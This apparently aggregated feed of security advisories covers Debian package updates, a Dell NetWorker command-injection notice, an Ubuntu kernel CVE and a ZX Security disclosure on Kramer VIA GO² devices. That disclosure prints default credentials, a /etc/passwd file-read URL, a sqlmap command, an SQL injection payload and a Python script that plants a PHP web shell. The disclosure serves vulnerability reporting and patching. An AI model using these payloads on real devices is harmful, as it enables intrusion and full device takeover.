Debian Linux Security Advisory 5421-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5421-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 07, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2023-34414 CVE-2023-34416Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode.For the stable distribution (bullseye), these problems have been fixed inversion 102.12.0esr-1~deb11u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSA8KsACgkQEMKTtsN8TjYSqBAAqZeT5wOx739rLds++dr7nw2AsHTokRdcQskPewJwqSOYY8ErKQbY5Crfre/0OXsuaq/gy0Y2+7LeAManTLl4uOzVz2wBEjWFYQ4ptLG543PzPWpbwFTlcx3HVdmtAMUrg65/eEk+m/wMFCfU3ydL3SSuT1EMjRMXGm39y2ocT3JK+CAME0ajxyHkFIbz+UjvUXnpbXTeA++O0Caexic5ACAi3GPtmFSJI1vtwI9nCCNQnQMbIWdaQ8ANOm1U1FT5Wli71M2YE8LVGIaGsavKR62DRa0Hr6omHGbmsXNRCclM6lrx7vaAt274IOghNCXYQzSd58nHw6TlshcKn7ScMpNmwYhmsSYbquk57pSNLxVU2cJEQo8V6QqoskbhnkiY0rSBKWWBzB5HiUABgYD3HHGedDJF3jhNQQNV8O0FhZq2NCCC3BDw/VdeRz2fF2LeQwc4XMP6rmJSNkc2PFETT0cKRVS4EpLJMth6lk8HVQfTeBZe0hqI8W7fwQ/T4LJa55KOFEct6p5eNG7aq5he3zOWH0BA2WwuvDA/y8M7hIUxifP92RhsevIMQDrwaMGwRb6ejme1ChHUrax+hGtBqR1ti6fNoT1jRqmJs+15JKMLQwArrWivLVNhnfMh3Tb9UEE/VdV6dKmenuCFBx5wJIMRT83wSuCIcYVtaznfZ88==wKyc-----END PGP SIGNATURE-----

Debian Security Advisory 5421-1

Debian Linux Security Advisory 5420-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5420-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffJune 07, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-3079Multiple security issues were discovered in Chromium, whichcould result in the execution of arbitrary code, denial of serviceor information disclosure.For the stable distribution (bullseye), this problem has been fixed inversion 114.0.5735.106-1~deb11u1.For the upcoming stable distribution (bookworm), these problems havebeen fixed in version 114.0.5735.106-1~deb12u1We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSAuzkACgkQEMKTtsN8TjYkHw//YSLfIYssjDXV6CkcW1SO+qGwPwB8/57wUJEpA8x73DjUhbUgatpbyuaKHWYX7knrTT7PG1nHgRaBWkWp+TFfpjsOEo/C6guIgwkYQ6GPLePLJe7RwWI2NxzH+o9GgqZhzJ34BC7YQd2FWKGe59cYE26TAqk8R7rSTi9PnPtZqO5Y7BlKo8g8WjJhIYLG8N58zFKxDQxt6XKwkKVJIIbImAb5qOGpThSB05vuan36EyX8UZWHoj5ao+z1gUL9HbSkznfEZUYpHIOf2VNcrI3DCrxJejESmtWaeL8XPC7PlVEgfOZoFIvdMo9ZY6hLUOGe1uWeozTSBELyRvvXdWRiSlmY1W4AysD5/3cOppCbyR+eixUgUMhCLNcYs8gHut/MFILMYMAlegDScNp3r4kZBSjyXX+ftEoagBSSHw0AFXswj8wb5adbalrWybH8Ky44BT2G3cd5tk1GAn/hh3WMoq+lOmB498UmTSuQe9PV+4FRdbYSPlIBotnmAQcASLeJLutlO2qjqf1DTO+mRA0MciIzoIsPjNNI9LxnWoPuMhsZb4KhuxJUfpSDWVoHDbqc7cTpzRTgJ0UnuTbNNUK6puDHhb3427u1T+tsAw0jEeYpg/0PhhRZfptz4RF9iFFFokKvpBdFOlAo643XD6yFCQjKfMDyJ5xdmUu2Ce1r2fw==HC9u-----END PGP SIGNATURE-----

Debian Security Advisory 5420-1

Debian Linux Security Advisory 5419-1 - Two vulnerabilities were discovered in c-ares, an asynchronous name resolver library.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5419-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuJune 07, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : c-aresCVE ID         : CVE-2023-31130 CVE-2023-32067Debian Bug     :Two vunerabilities were discovered in c-ares, an asynchronous nameresolver library:CVE-2023-31130    ares_inet_net_pton() is found to be vulnerable to a buffer underflow    for certain ipv6 addresses, in particular "0::00:00:00/2" was found    to cause an issue. c-ares only uses this function internally for    configuration purposes, however external usage for other purposes may    cause more severe issues.CVE-2023-32067    Target resolver may erroneously interprets a malformed UDP packet    with a lenght of 0 as a graceful shutdown of the connection, which    could cause a denial of service.For the stable distribution (bullseye), these problems have been fixed inversion 1.17.1-1+deb11u3.We recommend that you upgrade your c-ares packages.For the detailed security status of c-ares please refer toits security tracker page at:https://security-tracker.debian.org/tracker/c-aresFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmSAEaIACgkQO1LKKgqv2VRDGQf/dYEAeHJPGUsjOZqvhLvgCeKqgBuB0N3fz5Xpm/JmMmCoCihipy5xCCtAFnUifM+ERPjhkHPgerZEKPW9gSI/RXcbefRYu2sTfvaC0td3Gs1ZyGB4A3RrL6fCwEeMU3jYnfDZBfJpzmCBDx7HhYPx/IlKLWThEFvqvHZxTiKehelKdjV/VhOh9fvOqawPbrMt+DFeBabpN9Hbm1mqkDmeKLfeLzwGSXsSEKGpYPoz+6BCizFgppTHGIifWeBRdbcB0OA/qDD540ZLMRXCq53xmcU7qe8yDsdMuflX5ANIJ4iyG2pDYO3uwxcfCkDOofiTQdumVCGB6BZYVeucTc0dWg==4/KK-----END PGP SIGNATURE-----

Debian Security Advisory 5419-1

Debian Linux Security Advisory 5418-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5418-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
June 03, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : chromium  
CVE ID         : CVE-2023-2929 CVE-2023-2930 CVE-2023-2931 CVE-2023-2932  
                 CVE-2023-2933 CVE-2023-2934 CVE-2023-2935 CVE-2023-2936  
                 CVE-2023-2937 CVE-2023-2938 CVE-2023-2939 CVE-2023-2940  
                 CVE-2023-2941

Multiple security issues were discovered in Chromium, which could result  
in the execution of arbitrary code, denial of service or information  
disclosure.

For the stable distribution (bullseye), these problems have been fixed in  
version 114.0.5735.90-2~deb11u1.

For the upcoming stable distribution (bookworm), these problems have  
been fixed in version 114.0.5735.90-2~deb12u1.

We recommend that you upgrade your chromium packages.

For the detailed security status of chromium please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/chromium

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmR7SQoACgkQEMKTtsN8  
TjZJjxAAj/KHxjAYEEM1vGexQutPWTI4WJkxPh2Fszxv0HTa3tUuf2DqVpMvBNVr  
sHgSrkSIyTAvsLZsKvM6pc+RKNqP5x6XpFBN1g/Nv4hkJYHV8flFwyA6AGPkAozm  
uD3fCsIuh8ShqCTMwFF4LCA4dUIYvALA0UNQXJexB8plaiDJKaAN5GQxRCq9eYRM  
bc4OqdHeISfG30M+fIOWmKE6mLkC55ksfb9WbDUtsMNHvNrJdt3ki2K9yipTmtsk  
o+0MkV8cmE46hF7gC7KhbE/l9h8OLf/FHQyniEJEFNQ5L3S+bCJV0iFviO5PDjx4  
sooied9tWmQeq2X/ldykapQBWxQuQ0P2LDQgOvMiC81LGWAeJ39vEHpXew/DL0zt  
ACufvKSawqLR4Ckc/iNPAfFg9KECg5X0g6IwCWP/s169KibNdzm00sZ1fmw62Ewr  
N8szHvii0H+7PVpPWuNPb6FZUntC3c3tUwB1w3qnOKTwbLFGzsENQK4hKJudr04t  
sCQ+3S1o1Vvtxy6yhenuzuY4IhgQGGFdELhIP3Wsvg8Rmgj32VKmjPxwZz/cYjYK  
KpmTs7P0+NLegzokaIGeTSWxh2buzeNYnOIJpF130xw99I1f/RsizzN3Itb/3HEx  
wAeyv7DuLe3MNvk8+4WRKrn9aqcr8HPWWCBFzbqtkPv6W1ykvis=gkZS  
-----END PGP SIGNATURE-----

Debian Security Advisory 5418-1

Debian Linux Security Advisory 5417-1 - Multiple vulnerabilities have been discovered in OpenSSL, a Secure Sockets Layer toolkit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5417-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
May 31, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openssl  
CVE ID         : CVE-2023-0464 CVE-2023-0465 CVE-2023-0466 CVE-2023-2650  
Debian Bug     : 1034720

Multiple vulnerabilities have been discovered in OpenSSL, a Secure  
Sockets Layer toolkit.

CVE-2023-0464

    David Benjamin reported a flaw related to the verification of X.509  
    certificate chains that include policy constraints, which may result  
    in denial of service.

CVE-2023-0465

    David Benjamin reported that invalid certificate policies in leaf  
    certificates are silently ignored. A malicious CA could take  
    advantage of this flaw to deliberately assert invalid certificate  
    policies in order to circumvent policy checking on the certificate  
    altogether.

CVE-2023-0466

    David Benjamin discovered that the implementation of the  
    X509_VERIFY_PARAM_add0_policy() function does not enable the check  
    which allows certificates with invalid or incorrect policies to pass  
    the certificate verification (contrary to its documentation).

CVE-2023-2650

    It was discovered that processing malformed ASN.1 object identifiers  
    or data may result in denial of service.

For the stable distribution (bullseye), these problems have been fixed in  
version 1.1.1n-0+deb11u5.

We recommend that you upgrade your openssl packages.

For the detailed security status of openssl please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/openssl

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmR3XbdfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q57RAAnVKJS02ib/Uke98Kia//N7JAweY3jZ5IGluzGqms6di2Z9+1qW/qbjI+  
tGq2HdEd/ujN1+8hLciZN9U12Otkrt+Z//TvIJDBNd12sAiK6w5efVlIhESOW8z+  
nXxDBNsZv4ocqFcdWlXTaE1JQBd4MGULHsrItoczMwL1iiHfuvOxS7XqrttfGK2K  
WlnE3/uzmKJup77u4OnHxicTEaUGesV8fvv2uoI+gxkiQPZbEDLBINClDlhSgAae  
vMhrZrYLwS6vNZOG4fvDheHkd+3jO1YCv+742YeZbEfa6o3RXYGvLzSRNo5MhR/K  
N2/pxTHsRFaPlAxjys1UNGsZsIK7eZR0jyVRrF3PkbMgI4SVEyoqsI19i+viGoHY  
Ih6YkrSFxmQfK+1XDXS4RFOgVN900h4D/V/13udiswHShaFVsf4wu9SagmJtzR7X  
TzsphwZAbvxcqhaKdURgHoXaokMRxlO7vFijB1//Q+/uJJrkpLb+XTkN+SnujCSA  
48tAs3vnv9fki14+B6IQ9Tyg/Obhxk+z5Xb3W6H6xO1IfdmCibBvF77O8Q8uKIhD  
p3yhZeZY0VanKJMxquC3Yi0Ja6wbcJuww33/9/pqpTEdaoOnxb/wXNU0x2wIRBUL  
7IzNcmgVpQ1P3UhM58WZGOUS/0+IAtGfuEzZJiuWWKyV3hFvIEs=XKMH  
-----END PGP SIGNATURE-----

Debian Security Advisory 5417-1

Debian Linux Security Advisory 5416-1 - It was discovered that there was a potential buffer overflow and denial of service vulnerability in the gdhcp client implementation of connman, a command-line network manager designed for use on embedded devices.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5416-1                   security@debian.orghttps://www.debian.org/security/                                  Aron XuMay 31, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : connmanCVE ID         : CVE-2023-28488Debian Bug     : 1034393It was discovered that there was a potential buffer overflow and denialof service vulnerabilty in the gdhcp client implementation of connman, acommand-line network manager designed for use on embedded devices.For the stable distribution (bullseye), this problem has been fixed inversion 1.36-2.2+deb11u2.We recommend that you upgrade your connman packages.For the detailed security status of connman please refer toits security tracker page at:https://security-tracker.debian.org/tracker/connmanFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmR2MiEACgkQO1LKKgqv2VQR/QgApr1QeIQIfrW7WfJYD0C0xVXhLuO2X1D2yxgUjHIEChpaWu7ogcOh3dBNQkZAWmsWqFs/TnCdrltt8txJHfBz/PYkzPjwBN/CHZjW2t7HxCZqmA3tnuHGtzotJRQD5G2d1W5ycJUL88ZWar0GKn98nwdsxTCRy8mi157Gy588pTrQbS+P9HtTK0I0eUysoupKoEb2HGgn6nlpQJoRWqJnqkv7FmB6jOecP4ivAnmjwiciwMztIvggsJ+yjYns6BXLzNQyU5T0ch2a2Mduddm4iR9Ax7KV8fv8+UIEEzwp+2tCKctV/yAmQodgK3LJsgIkoFMJBMjevuozcp8o6QNbZw=åQs-----END PGP SIGNATURE-----

Debian Security Advisory 5416-1

KramerAV VIA GO² < 4.0.1.1326 is vulnerable to Unauthenticated arbitrary file read.

**Introduction**

Kramer VIA GO² devices were vulnerable to multiple issues, including:

*   Unauthenticated arbitrary file read (CVE-2023-33507)
*   Unauthenticated SQLi (Squeely) (CVE-2023-33509)
*   Unauthenticated file upload resulting in RCE (CVE-2023-33508)

By chaining with previously discovered privilege escalation through misconfigured Sudo rules (CVE-2021-35064), it was possible to completely take over a device from an unauthenticated standpoint.

Throughout the disclosure process, Kramer have been exceedingly helpful and responsive. They were quick to confirm the issues and release a patch that fully resolves the issues.

**What is a Kramer VIA GO²?**

> VIA GO² gives iOS, Android, Chromebook, PC, and Mac users instant wireless connectivity with 4K advanced presentation capabilities. Kramer’s new VIA 4.0 is all about the end user. The new VIA application UI is intuitive, user-friendly and much easier to use. VIA 4.0 enables any user, including guests, to easily and securely connect and automatically disconnect at the end of the session.

After finding a device with default credentials (su:supass), it was discovered that it was possible to upload a font with an arbitrary extension and no content restrictions. This meant it was possible to upload a font which is actually a PHP script with the extension .php. Once the path on disk was found, visiting directly in a browser would execute the PHP file and allow a user to perform commands on the underlying operating system. From there, we created a dump of the available web application/PHP source code. The code was protected using IONCube, however this was bypassed using commonly available tools such as easytoyou.eu.

Available handlers were reviewed for issues and the three high severity vulnerabilities were discovered. It is likely that there are more within the codebase, and our audit of the code was in no way exhaustive.

After reviewing the latest firmware for these devices (4.0.1.1326), we noted that the handlers were _not_ included with the Debian package. The file runpkg.sh, which is run as part of the update process, contained the following commands:

    ...
    rm -rf /var/www/html/downloadRecording.php
    rm -rf /var/www/html/downloadMedia.php
    rm -rf /var/www/html/UploadWallpaper.php
    ...
    

This indicates that these endpoints should be removed by a firmware update.

While the firmware itself is password protected, simply by decoding the source code the decryption password was discovered.

**Proofs of concepts****Unauthenticated file read (CVE-2023-33507)**

The following endpoint allowed for the contents of arbitrary files on the file system to be retrieved:

*   http://XXX/downloadRecording.php?file=/etc/passwd

**Unauthenticated SQLi (CVE-2023-33509)**

This could be exploited with the following sqlmap command:

    sqlmap -u 'https://XXX/downloadMedia.php?medId=*' --dbms mysql --risk 3 --level 5 --technique B --threads 10
    

As an added bonus, the contents of arbitrary files could be obtained with the following payload:

*   https://XXX/downloadMedia.php?medId=-1+UNION+SELECT+"/../../../../etc/passwd"

**Unauthenticated RCE via File Upload (CVE-2023-33508)**

This issue can quickly be identified by attempting to access the endpoint:

*   http://XXX/UploadWallpaper.php

If this handler returns the message “Please enter the image to upload” it is very likely to be vulnerable.

The following Python payload can be used to obtain RCE:

    import requests
    import sys
    from urllib3.exceptions import InsecureRequestWarning
    
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    
    SHELL = '<html><head><title>babyshell</title></head><body><pre><?php echo $_REQUEST["cmd"]; ?></pre><br/><pre><?php echo system($_REQUEST["cmd"]); ?></pre></body></html>'
    
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target.com|1.2.3.4>")
        exit(1)
    
    target = sys.argv[1]
    
    url = f'https://{target}/UploadWallpaper.php'
    
    print("Uploading shell")
    
    resp = requests.post(url, files={'data': ('zx.php', SHELL)}, verify=False)
    
    if "Image added sucessfull" not in resp.text:
        print("Shell failed to upload")
        exit(1)
    
    print("Shell uploaded. Checking shell")
    
    url = f"https://{target}/uploads/large/zx.php"
    resp = requests.get(url, verify=False)
    if "Minishell" not in resp.text:
        print("Shell failed")
        exit(1)
    
    print("Shell available at:", url)
    

**Potential Impact**

Complete device compromise is possible, either via the RCE or obtaining user passwords via the Squeely.

**How to Fix It**

First update to version 4.0, then apply version 4.0.1.1326 or later.

**Vulnerability Disclosure Timeline:**

*   21/02/2023 Disclosed issue to CERT NZ
*   09/03/2023 Response from Vendor
*   17/03/2023 Vendor released patched firmware to ZX. ZX identified that the patch removes the vulnerable endpoints.
*   31/05/2023 CVEs assigned

CVE-2023-33507: Kramer VIA GO² - ZX Security


Dell NetWorker 19.6.1.2, contains an OS command injection Vulnerability in the NetWorker client. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. This is a high severity vulnerability as the exploitation allows an attacker to take complete control of a system, so Dell recommends customers to upgrade at the earliest opportunity.



**Vaikutus**

High

**Tiedot**

**Proprietary Code CVE(s)** 

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2023-25539

Dell NetWorker 19.6.1.2, contains an OS command injection Vulnerability in the NetWorker client. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. This is a high severity vulnerability as the exploitation allows an attacker to take complete control of a system, so Dell recommends customers to upgrade at the earliest opportunity.

8.4  
 

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H  
 

**Proprietary Code CVE(s)** 

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2023-25539

Dell NetWorker 19.6.1.2, contains an OS command injection Vulnerability in the NetWorker client. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. This is a high severity vulnerability as the exploitation allows an attacker to take complete control of a system, so Dell recommends customers to upgrade at the earliest opportunity.

8.4  
 

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H  
 

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**CVE(s) Addressed**  
 

**Product**

**Affected Version(s)**

**Updated Version(s)**

**Link to Update**

CVE-2023-25539

Dell NetWorker  
NVE  
 

NetWorker 19.6.1.2 Linux and prior releases  
NetWorker  
19.7.0.3 Linux and prior releases,  
19.7.1 Linux

19.8.0.1 & Later releases

19.7.0.4 & Later releases

https://www.dell.com/support/home/en-ca/product-support/product/networker/drivers  
 

 

**CVE(s) Addressed**  
 

**Product**

**Affected Version(s)**

**Updated Version(s)**

**Link to Update**

CVE-2023-25539

Dell NetWorker  
NVE  
 

NetWorker 19.6.1.2 Linux and prior releases  
NetWorker  
19.7.0.3 Linux and prior releases,  
19.7.1 Linux

19.8.0.1 & Later releases

19.7.0.4 & Later releases

https://www.dell.com/support/home/en-ca/product-support/product/networker/drivers  
 

 

**Kiitokset**

Dell Technologies would like to thank Maciej Kosz for reporting this issue.

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2023-04-03

Initial Release

2.0

2023-05-11

Made changes to Updated Versions

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Lisätietoja**

The impacted component is NetWorker client and the affected platforms are Linux (CentOS, OEL, SuSE, RHEL, Debian, Ubuntu, Fedora).

NetWorker Family, NetWorker, NetWorker Series, NetWorker Module, Product Security Information

11 toukok. 2023

CVE-2023-25539: DSA-2023-060: Dell NetWorker Security Update for an nsrcapinfo Vulnerability.

Jean-Baptiste Cayrou discovered that the shiftfs file system in the Ubuntu Linux kernel contained a race condition when handling inode locking in some situations. A local attacker could use this to cause a denial of service (kernel deadlock).

CVE-2023-2612: CVE-2023-2612 | Ubuntu

Debian Linux Security Advisory 5415-1 - Two security issues were discovered in LibreOffice, which could potentially result in the execution of arbitrary code when loading a malformed spreadsheet document or unacknowledged loading of linked documents within a floating frame.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5415-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 28, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libreofficeCVE ID         : CVE-2023-0950 CVE-2023-2255Two security issues were discocvered in LibreOffice, which couldpotentially result in the execution of arbitrary code when loading amalformed spreadsheet document or unacknowlegded loading of linkeddocuments within a floating frame.For the stable distribution (bullseye), these problems have been fixed inversion 1:7.0.4-4+deb11u7.We recommend that you upgrade your libreoffice packages.For the detailed security status of libreoffice please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libreofficeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRzchEACgkQEMKTtsN8TjbRrRAAh/7Ahy9I1prBZqnkRKL3JubDmB7+ni9lK1Jmw0wRGVEBFiFOL6wmJXNiHeqXwx/mNv0/PBZGBNsicKAtftv9ixWfWumBKZSWEfPF9wVDwYGBF6xgC8adCcHk4PZ+/DhuNmGoeTJt6FokhkD/AiATR4IhJJLVUwexZV4jMTRyK85JJ4fTkjZnWgk+OkhHMEBMnAIqjWvpS5HapkTuqBvkzNS9+CgZgi03hcSCCdOP4ioGCQt6pHMrpZ0PyOyJukKOR3FO7YMV1U93dcH7wBrMMRilhH6CAXlAVhQz+48A9sXpZN44zYDdEWv6PNrMNhscLXH2bP1JFB2QGh43dMwt+C5VLlWU1BEWHndVE4Juiq5gkBbfCiENXbjSjxt61f1ZxqlMWBGirgePk9p1y0oZj3E0PKgxo8ViCU5ReaRw2LglGzLR+6bgeav52Zk5nJfKQThGKRWbhncXkF0exVtaaJIVw7NGjzPPZqGsIin/XySxBVIljzP1bPi/cW3oW2t81e5uL6ffWM37sM1K0H2E5CQRNvAr0S2L+5AeJa3f1qmzN00pwnmGdLnV/xA0hftn4NWRtdoFbnPTclpyOVH5M3P4D58NY9Hbc+VAQhViWAdt05HnKtKlxU/zq3Sn+qo9IVAtjaD+DiRuhZfXKNaLbP8apQoISsjZnemH0X+HQVM57e-----END PGP SIGNATURE-----

Tag

#debian